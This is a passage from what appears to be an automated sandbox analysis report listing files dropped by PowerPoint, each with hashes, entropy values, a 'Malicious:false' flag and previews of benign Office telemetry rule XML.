                                                                                                                              Entropy (8bit):4.634867139946224
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd4OerXhSuIYVIPMxIiOySAYlMNO2su:2dOrXhSjYeC
                                                                                                                              MD5:C78B4022EAA63D42B9E0826608F9C2FB
                                                                                                                              SHA1:9C35CF49747F257A89F3BC36D196C631419E4E55
                                                                                                                              SHA-256:EEA7FE5109EE3FFCD1540C6154EAEED4D1C039A9D19DC9AE64481B7A69CB283C
                                                                                                                              SHA-512:B6E0B9719CAAA5517984973E32E35621FE67B396D2C3DFA5E386531DD5335A6E168C2014DC128775FFA915976010E9688A987BF6F144FDDB729E202373E9C96E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100115" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="8yllb" />.. </S>.. <C T="W" I="0" O="false">.. <V V="Expand" T="W" />.. </C>.. <C T="U32" I="1" O="false">.. <S T="1" F="Context" />.. </C>.. <C T="U64" I="2" O="false">.. <S T="1" F="Instance" />.. </C>.. <C T="U32" I="3" O="false">.. <S T="1" F="AuthorCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):461
                                                                                                                              Entropy (8bit):4.61410460841382
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7cKZ4HperhrJ3pd+/O9J5xnJUq+/ClynMJ/IiiLynJo/AYlMNOn2sby:TMHdLZOerX/ugjIPMxIiOySAYlMNO2su
                                                                                                                              MD5:DFE2A6E6D5636E6139684080D864D578
                                                                                                                              SHA1:67C4644229F2C37E9677A0A06D585A98D76804C7
                                                                                                                              SHA-256:65977035F7CBDEE6200B140F8ED1320716D165259BA2B7D00672DD2AA08E1E81
                                                                                                                              SHA-512:AFCBE73D821C7684C03522B17D7DF1361E1D3F212308FE8C49F9EF76EB2F9AC369339128DA81273F8F5F1B4720FE20EA23AA8517A2903A8DF8FE7455180EA3D3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100116" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="8ylla" />.. </S>.. <C T="W" I="0" O="false">.. <V V="Collapse" T="W" />.. </C>.. <C T="U32" I="1" O="false">.. <S T="1" F="Context" />.. </C>.. <C T="U64" I="2" O="false">.. <S T="1" F="Instance" />.. </C>.. <C T="U32" I="3" O="false">.. <S T="1" F="AuthorCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):535
                                                                                                                              Entropy (8bit):4.635238648155877
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdaOerXS7usrSIPMxIiOySAYlM4DRALNO2su:2dgrXS7vBLa
                                                                                                                              MD5:E52BD4E82D323BE9C6262BA9C941CFF9
                                                                                                                              SHA1:F01E92DD4FBCC428DE1E40D34813C4A84355618E
                                                                                                                              SHA-256:19125F3CC6EDC765B5C14CB44EDC4E352DD8BD502635734A000BD94497536194
                                                                                                                              SHA-512:A638B41F93387C27A28FF3DC0D88D88CE92B21237A8875BFAB99D67A13558397D4FE2138F22DF3CBD1BD5FA226D621B543BDBB13B1139E44BC1848CF3A08329A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="8yllf" />.. </S>.. <C T="W" I="0" O="false">.. <V V="Click" T="W" />.. </C>.. <C T="U32" I="1" O="false">.. <S T="1" F="Context" />.. </C>.. <C T="U64" I="2" O="false">.. <S T="1" F="Instance" />.. </C>.. <C T="U32" I="3" O="false">.. <S T="1" F="AuthorCount" />.. </C>.. <C T="U64" I="4" O="false">.. <S T="1" F="AuthorDataSource" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):680
                                                                                                                              Entropy (8bit):4.59746090389454
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBOOerXYAuLIPMxIiOySAYlM4DRALnoIaxxR+7xNO2su:2dBkrX7FLP3473
                                                                                                                              MD5:42438615DD8461113A11FE4E3A7BECAA
                                                                                                                              SHA1:F9A171CA300D7E595E074CB315BB9E1C2206486B
                                                                                                                              SHA-256:C606526C162A3632357F07699B7D9C6924AD73C10EF4330FFEC4D0064142393F
                                                                                                                              SHA-512:BC8A2CF92A311BAF4EBD19EB93E7A47A45FEF765A4C4C2C4203E428CF45DB68622CCDE7C25BCBC09B2907F5882427EE4E2AE4CA0044389CFCBBE738AFA684014
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100118" V="1" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="8ylle" />.. </S>.. <C T="W" I="0" O="false">.. <V V="NameState" T="W" />.. </C>.. <C T="U32" I="1" O="false">.. <S T="1" F="Context" />.. </C>.. <C T="U64" I="2" O="false">.. <S T="1" F="Instance" />.. </C>.. <C T="U32" I="3" O="false">.. <S T="1" F="AuthorCount" />.. </C>.. <C T="U64" I="4" O="false">.. <S T="1" F="AuthorDataSource" />.. </C>.. <C T="B" I="5" O="false">.. <S T="1" F="InitialState" />.. </C>.. <C T="U32" I="6" O="false">.. <S T="1" F="NameState" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1137
                                                                                                                              Entropy (8bit):4.703094974590429
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQmtun8DWyZcAAwEi0iiFi7i9iwOi40NCahIffONf6osf/yGnxMmKN06OXj4i:2dBvDb0w860tS9KPO8BtcRwtI
                                                                                                                              MD5:D38E1491A5483BA2DF273DF15B80A477
                                                                                                                              SHA1:279595B33F249F159ED2676A9829FDA6BC65008A
                                                                                                                              SHA-256:F6F3743E9AB4D0EB53DC8A6601DBE63E96642C1A7AF3CA9970B2F07B4E257463
                                                                                                                              SHA-512:FDDCC011AD78950D9105D847D2F7024835742EFA7E55C4892BC318E679B8739203511973B375CCB804AF0A2FA9897A643F092B8B1EC07AC765B254993EE1B594
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100119" V="0" DC="SM" EN="Office.UX.PresenceUIUsage" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="100113" />.. <R T="2" R="100114" />.. <R T="3" R="100115" />.. <R T="4" R="100116" />.. <R T="5" R="100117" />.. <R T="6" R="100118" />.. <US T="7">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. <S T="6" />.. </US>.. </S>.. <C T="W" I="0" O="false" N="EventType">.. <S T="7" F="0" />.. </C>.. <C T="U32" I="1" O="false" N="Context">.. <S T="7" F="1" />.. </C>.. <C T="U64" I="2" O="false" N="Instance">.. <S T="7" F="2" />.. </C>.. <C T="U32" I="3" O="false" N="AuthorCount">.. <S T="7" F="3" />.. </C>.. <C T="U64" I="4" O="true" N="AuthorDataSource">.. <S T="7" F="4" M="Ignore" />.. </C>.. <C T="B" I="5" O="true" N="IsInitialNameState">.. <S T="7" F="5" M="Ignore"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):409
                                                                                                                              Entropy (8bit):5.271528662709587
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdTdkOun8DWyZcAAwEerm73tOpvNO2su:2d5bvDb0wLr0U/
                                                                                                                              MD5:02042A13C2C5CD1B3EDC95A6B15E4FC7
                                                                                                                              SHA1:F08188D7215D13A767C4D4FC517BFA881D985712
                                                                                                                              SHA-256:034C44375BF10EF9DF06C6D354EF65C6739D8E467A2F17F2F169C92001EC038F
                                                                                                                              SHA-512:DCC10C3B5065BC5CC7C86834DCEEB9948CA30CF76FCC88F68F6A4BC9048D65D3705BE1380C5F0AC28B738DC38DDBAB122C6A248E460F61D497C294FE8AF3007F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100124" V="2" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutSuppressed" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qnt4" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):509
                                                                                                                              Entropy (8bit):5.2429290585512724
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdYdk9un8DWyZcAAwEerHFU3tOpvStMSAY9NO2su:2du8vDb0wLrH+UctMgz
                                                                                                                              MD5:03AED7AA46EBBB9175F30A2BF8F7F530
                                                                                                                              SHA1:F0FA4FAC253E9DE69F814A464BEA53DCDB6D6D7C
                                                                                                                              SHA-256:71BE055A91F15DAAF9F37FA90A0A65D6EBC7C20CEF1D41445854500576F7F068
                                                                                                                              SHA-512:468F848A7DA60EFCDE910031D3AED6E1A9E84016DCA7540B9C4AD3A00492056D3D57E5C596756665B18CA6F661280B22C84594F004110E6E7BBF761B8E206128
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100125" V="2" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutFailedToCreateWICFactory" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bisgt" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="U32" I="1" O="false" N="APIHResult">.. <S T="1" F="APIHResult" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):515
                                                                                                                              Entropy (8bit):5.259684957183188
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5PdkMSBun8DWyZcAAwEerHFLS3tOpvStMSAY9NO2su:2d51kBvDb0wLrHsUctMgz
                                                                                                                              MD5:170633F0EAB1976D69AF72CD49C6766E
                                                                                                                              SHA1:426EB2461DF891C78C7228EA87262E643D721CBC
                                                                                                                              SHA-256:A1CECD578E1263D01D03633FF36054F5299E6F1F6AB39B1C46D75FBC6005655A
                                                                                                                              SHA-512:F50B9A8422EF1DE054081299EF156C6B436D945A1D6F214CD613BDA1A0CC3B14DD393DB54DB760264B81789900B5DC514D858A5EA111961B04335979B701C130
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100126" V="2" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutFailedToGetDecoderFromFilename" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bisgv" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="U32" I="1" O="false" N="APIHResult">.. <S T="1" F="APIHResult" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):501
                                                                                                                              Entropy (8bit):5.234524039048711
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdWdkLpun8DWyZcAAwEerHFY3tOpvStMSAY9NO2su:2dkkvDb0wLrHyUctMgz
                                                                                                                              MD5:85C60DF6C18137A60BF1A03F35F2EEB5
                                                                                                                              SHA1:F6A5401EC2E7AAF2B706A0FBB694BB84CE41F2D3
                                                                                                                              SHA-256:A31B06DD5540239D68D5F75CF8FC416C1FD5C24A8237EEC8DDD07CE3DFBD92E3
                                                                                                                              SHA-512:AA0766C418EDAC12F5CABA90807FB800E40EB6A6D4A4EDB167755126869F05B295BD3D35B033C06FF7CD1856B77C0A0011C5A095420D8223A0F10ADA3EC80087
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100127" V="2" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutFailedToGetFrame" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bisgx" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="U32" I="1" O="false" N="APIHResult">.. <S T="1" F="APIHResult" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):5.254995423773981
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdmdkdun8DWyZcAAwEerX3tOpvNO2su:2dUGvDb0wLrXU/
                                                                                                                              MD5:05F479C943851C6FF70E8762CFCAF94A
                                                                                                                              SHA1:98E7C7D2BC7B278F491C7F00F44A42BD8D935E57
                                                                                                                              SHA-256:F19EDD0DEC9F58B711ACD45E52409321BFF693853557690E9CEDB0BD0E71A942
                                                                                                                              SHA-512:23322F5E4CB27432114C91EED94D6FF6E654B63EFA6D28B364CCF01E83306699BAE5869F27B2D295B67070CCB4EC3991DF32B2973D50A23BB1D3D3E6779A7CC4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100128" V="1" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutFailedToCreateVideo" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bl7ep" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):5.258730267850173
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdcdkxtun8DWyZcAAwEerLVU73tOpvNO2su:2dysvDb0wLr4U/
                                                                                                                              MD5:3BE6320F54CACC68FF5332D7F19017AF
                                                                                                                              SHA1:34321424619ABF9C69E03109C6AC9633C09A0490
                                                                                                                              SHA-256:B10674D4BB061FB003BACC6AFBE070A7183D2D1A287099936FFFB931E3D5F5EE
                                                                                                                              SHA-512:252A8498605D19C3DAF5ED983C40541A6E77B1BAA6AF9BBDC63228C2A81C79076AC3EB405393BB902C79F70E644D7AA103EA8D7FF0D8614C2E432F9143A6FEDE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100129" V="2" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutFailedToCreateImage" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bep2n" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):485
                                                                                                                              Entropy (8bit):5.202017526192053
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBCvdun8DWyZcAAwEerD43tOpvdmARNO2su:2dGdvDb0wLrkUDT
                                                                                                                              MD5:765304F24D02DEB0E55BE018E9FEFB99
                                                                                                                              SHA1:9B3D0B42621BCF5A5EE53B01E1D841EF21776DE9
                                                                                                                              SHA-256:7962562BFB89190AD2B7C932D1EAC211A8533B7A6D8842736FDB2424EABA22AB
                                                                                                                              SHA-512:CC1E376C53E372A762B4916BDA601EB0D67B337EBCD7E8FD85D3CBD5E0FC1E04E0EEAEAD489D86E354B8B1265DEE491AC594B52A77858F4D7EBB0B3A93779098
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100130" V="0" DC="SM" EN="Office.UX.TeachingCallout.AnchorInvalidCallback" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmzya" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="W" I="1" O="false" N="AnchorId">.. <S T="1" F="AnchorId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):639
                                                                                                                              Entropy (8bit):5.057028798011694
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdy/dkkLun8DWyZcAAwEerZ3tOpvdmARdyEXqdUNIdNO2su:2dClvDb0wLrZUD/Ip
                                                                                                                              MD5:FE6EFF7CC51E8C64DAFE15F2F5B08F0A
                                                                                                                              SHA1:3619F72BC2A5656EDA6B3098629BC1D43F567143
                                                                                                                              SHA-256:DCA842112B5A586E2B07AC91EE140B305C57F4004D40CAF8E8AFC09D4FFE2089
                                                                                                                              SHA-512:00E577AEFF86E2F062336BA1C634F087B62C824F0D7EADC92B8971A6A3D6532853458E1F2CB7AFF4C11141681CAE3EC77068EEEC0CA9CB01F3A21A5168D7EC96
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100131" V="1" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutCoachmarkShown" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qnuf" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="W" I="1" O="false" N="AnchorId">.. <S T="1" F="AnchorId" />.. </C>.. <C T="W" I="2" O="false" N="Title">.. <S T="1" F="Title" />.. </C>.. <C T="W" I="3" O="false" N="Info">.. <S T="1" F="Info" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):656
                                                                                                                              Entropy (8bit):5.097491847536972
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdVndkkD5kEcFdun8DWyZcAAwEeri3tOpvdmARdyEXqdUNIdNO2su:2dzNLc7vDb0wLriUD/Ip
                                                                                                                              MD5:109B2CA6601FAFC1E0C81848FE7B35FF
                                                                                                                              SHA1:012627B761E319EB73B51190DC3D884FE84D7D8D
                                                                                                                              SHA-256:1E6A4E86CEF8C6EB85D2297E959D418BEA102DAD9133177462800CB4AF3E8533
                                                                                                                              SHA-512:D97E22E0E603B06C1EFCFFAFFA413BF2AE4231545D717063D01E6D7445985F7E6CA65D89FE961F2C7BDC65A28AA93C88224C007715CA2A6B171D97DB7D27DA18
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100132" V="1" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutCoachmarkHiddenWithoutExpanding" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qnue" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="W" I="1" O="false" N="AnchorId">.. <S T="1" F="AnchorId" />.. </C>.. <C T="W" I="2" O="false" N="Title">.. <S T="1" F="Title" />.. </C>.. <C T="W" I="3" O="false" N="Info">.. <S T="1" F="Info" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):643
                                                                                                                              Entropy (8bit):5.0658952579474645
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdo/dkk8Lun8DWyZcAAwEerPMS3tOpvdmARdyEXqdUNIdNO2su:2doFuLvDb0wLrPMSUD/Ip
                                                                                                                              MD5:3711CCBD08320FAE2AEE12194EA45A68
                                                                                                                              SHA1:970D1B229C11C851E0964A7C0F333377734F1D10
                                                                                                                              SHA-256:78AFCBBCFDE75A7DEB70B8AE80213D76D06D824D5F494719081F507E791E889D
                                                                                                                              SHA-512:5300894FDDB0A075E7DA7FE828000B64EDB7795E47219EAB2BD7504E7C1D058381CB213D59D587185F92A40AB6F029E4AEB29E4DA83984983C409B9864B68ACD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100133" V="1" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutCoachmarksTUIShown" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qnud" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="W" I="1" O="false" N="AnchorId">.. <S T="1" F="AnchorId" />.. </C>.. <C T="W" I="2" O="false" N="Title">.. <S T="1" F="Title" />.. </C>.. <C T="W" I="3" O="false" N="Info">.. <S T="1" F="Info" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):742
                                                                                                                              Entropy (8bit):5.0659835404992695
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdNAOdkk8/LIun8DWyZcAAwEerhS3tOpvdmARdyEXqdUNIdnHD9rgL0NO2su:2dN/ucvDb0wLrhSUD/IDR1
                                                                                                                              MD5:570EE9E464A3F9CF12C8FB0F50B48E06
                                                                                                                              SHA1:AC394C063E80F880195FE859048B90BB2E42891F
                                                                                                                              SHA-256:B881023859406F131865B38F176EA00D08C3D9A0BEDBF9BB189BF051D99504D5
                                                                                                                              SHA-512:97EB77C67DF5604B3A6ADFB0911446492C9B83C87D1FB8A47B9D84AA16162489FEAAFCE1112C6A720B2DC02579FF9F55E64BFD5AAAC998461DDDE6FA4A967B8E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100134" V="1" DC="SM" EN="Office.UX.TeachingCallout.TeachingCalloutCoachmarksTUIHidden" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qnuc" />.. </S>.. <C T="W" I="0" O="false" N="TeachingCalloutId">.. <S T="1" F="TeachingCalloutId" />.. </C>.. <C T="W" I="1" O="false" N="AnchorId">.. <S T="1" F="AnchorId" />.. </C>.. <C T="W" I="2" O="false" N="Title">.. <S T="1" F="Title" />.. </C>.. <C T="W" I="3" O="false" N="Info">.. <S T="1" F="Info" />.. </C>.. <C T="B" I="4" O="false" N="CalloutAlwaysShow">.. <S T="1" F="CalloutAlwaysShow" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):409
                                                                                                                              Entropy (8bit):5.284731259430513
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd0Q4Iun8DWyZcAApAQierVLE7WNoSNO2su:2dN4IvDb0/r9H
                                                                                                                              MD5:1EA191226A363A271C15C2F470CA5A27
                                                                                                                              SHA1:88C8FFA286C023D049F764164C905993F326AF75
                                                                                                                              SHA-256:5AB9DBD686E3724114A39F1F5B743186C3E54BDA7651C7116484CBFE2472EA20
                                                                                                                              SHA-512:BA80F037204D9050EBC138C88657810F7D26552608D942678853B05F3E7A90B9960BA92C5E460F37C6927614FBE6474AAC271BDD935C667D1108A68A731267E3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100201" V="0" DC="SM" EN="Office.UX.HyperlinkDialogControlTriggered" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bg4y8" />.. </S>.. <C T="U32" I="0" O="false" N="Surface">.. <S T="1" F="Surface" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):595
                                                                                                                              Entropy (8bit):5.183023140804415
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdZqRoun8DWyZcAApAQierRD2HXAGMnPyfY7KMyntwKXO+NO2su:2d4CvDb0/rRa95qKEz+
                                                                                                                              MD5:0DF2BC07A6BBFDF8FA8DAFF18DE89752
                                                                                                                              SHA1:95BFD0A56DF9F1B8CBB157C102EFCD17E7D13813
                                                                                                                              SHA-256:7C039ED8E77E4B44A8A4EDC8DDD3F020893B8EE3588E52A31505774EF53A882C
                                                                                                                              SHA-512:17DDC165955D9C28519AB0FF4B82F80F3757A7063289C12D25A8146558380FBC311B56C9C8CC633831466430A14A3ED233DD0454217F172A2ADA487CADE2F094
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100202" V="0" DC="SM" EN="Office.UX.HyperlinkDialogInsert" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhdvx" />.. </S>.. <C T="U32" I="0" O="false" N="ActivePane">.. <S T="1" F="ActivePane" />.. </C>.. <C T="B" I="1" O="false" N="HasScreenTip">.. <S T="1" F="HasScreenTip" />.. </C>.. <C T="B" I="2" O="false" N="HasDistinctFriendly">.. <S T="1" F="HasDistinctFriendly" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1053
                                                                                                                              Entropy (8bit):5.065099138149148
                                                                                                                              Encrypted:false
